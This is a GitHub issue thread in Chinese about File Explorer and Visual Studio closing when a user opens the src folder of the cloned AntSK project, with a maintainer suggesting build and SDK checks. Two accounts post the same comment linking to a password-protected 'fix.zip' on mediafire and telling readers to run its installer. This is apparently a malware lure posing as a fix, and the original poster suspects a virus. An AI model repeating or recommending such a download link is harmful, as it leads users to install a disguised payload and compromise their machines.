### ISSUE TITLE
代码克隆后，进入src目录，资源管理器就关闭

### ISSUE THREAD

**Issue by ccliushou** [AIDotNet/AntSK#103]
windows11 环境，clone代码后，通过鼠标点击进入src目录后，资源管理器就自动关闭。

如下界面，很快就被自动关闭。用vs2022去打开项目，浏览到src目录，vs也会被关闭。
![image](https://github.com/user-attachments/assets/e0f36d0c-0df2-4f90-8ab2-31824e243392)

![image](https://github.com/user-attachments/assets/1ec23aad-066d-45bf-9453-8231ccc8b998)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ccliushou** [comment]
@WSA1k 靠谱吗？感觉好像是病毒啊？

**Comment by xuzeyu91** [comment]
看你这个似乎是没安装VS

**Comment by xuzeyu91** [comment]
可以使用dotnet build看看是否报错，也有可能是缺少Aspire SDK

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ccliushou** [comment]
@xuzeyu91 Aspire SDK应该是装过了。
![image](https://github.com/user-attachments/assets/e1d94998-1225-43c0-90a1-edf4260d08fb)
![image](https://github.com/user-attachments/assets/f744192e-1981-450c-91f4-861ee0287e5a)

dotnet build也没报错误。
![image](https://github.com/user-attachments/assets/a53ba811-0746-401f-8778-c66ffada520e)

**Comment by xuzeyu91** [comment]
dotnet build 没问题则说明没问题，应该还是VS环境问题
